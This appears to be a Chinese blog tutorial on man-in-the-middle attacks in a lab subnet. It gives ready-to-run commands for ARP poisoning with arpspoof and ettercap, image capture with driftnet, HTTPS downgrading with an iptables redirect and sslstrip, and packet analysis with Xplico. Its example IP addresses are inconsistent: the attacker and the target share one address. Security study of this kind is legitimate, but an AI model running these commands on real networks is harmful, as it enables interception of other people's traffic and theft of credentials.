中间人攻击
中间人攻击-ARP欺骗
arpspoof
语法格式:
1 | arpspoof [options] host |
开启路由转发:
1 | echo 1 > /proc/sys/net/ipv4/ip_forward |
查看攻击主机和目标主机ARP缓存表,得到网关信息:
1 | arp |
举例:攻击主机IP为192.168.29.134,MAC为00:0c:29:79:95:9e;目标主机IP为192.168.29.134,MAC为00:0c:29:6c:5d:69;网关IP为192.168.29.2,MAC为00:50:56:f1:40:cb。
分别对目标主机和网关实施ARP攻击:
1 | arpspoof -i eth0 -t 192.168.29.135 192.168.29.2 |
也可以用一个命令完成:
1 | arpspoof -i eth0 -t 192.168.29.135 -r 192.168.29.2 |
Ettercap
过时了…玩玩可以,实战用Bettercap。
启动图形界面:
1 | ettercap -G |
先Unified sniffing,再Scan for hosts,打开Hosts list查看主机列表,选中两个主机分别Add to Target1、Add to Target2,选择Start sniffing。
启动ARP注入攻击选择ARP poisoning,勾选Sniff remote connections复选框。
停止需要Stop sniffing和Stop mitm attack(s)。
下面介绍命令行用法:
1 | ettercap [options] [target1] [target2] |
对目标主机192.168.29.136实施中间人攻击:
1 | ettercap -Tq -M arp:remote /192.168.29.136// /192.168.29.2// |
当嗅探到数据包时输出。
Wireshark
略。
driftnet
实施中间人攻击后捕获图片:
1 | driftnet [options] |
ettercap实施中间人攻击:
1 | ettercap -Tq -M arp:remote /192.168.29.135// /192.168.29.2// |
driftnet开始监听:
1 | driftnet -i eth0 -d /root/image |
SSLStrip
HTTP数据可直接监听,HTTPS需要先解密。
开启路由转发:
1 | echo 1 > /proc/sys/net/ipv4/ip_forward |
将所有HTTP数据导入到10000端口:
1 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 |
使SSLStrip监听10000端口,获取信息:
1 | sslstrip -a -l 10000 |
当前目录下会创建一个日志文件,监控它:
1 | tail -f sslstrip.log |
中间可能混杂着python语法报错,不用理会。
再进行ARP欺骗攻击:
1 | ettercap -Tq -M arp:remote /192.168.29.135// /192.168.29.2// |
Xplico
捕获到数据包后,对数据进行快速分析。
启动:
1 | service xplico start |
访问http://IP:9876/,默认用户名密码都是xplico。
不知道啥原因打不开登录界面,摆烂了…
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 The Blog of Monoceros406!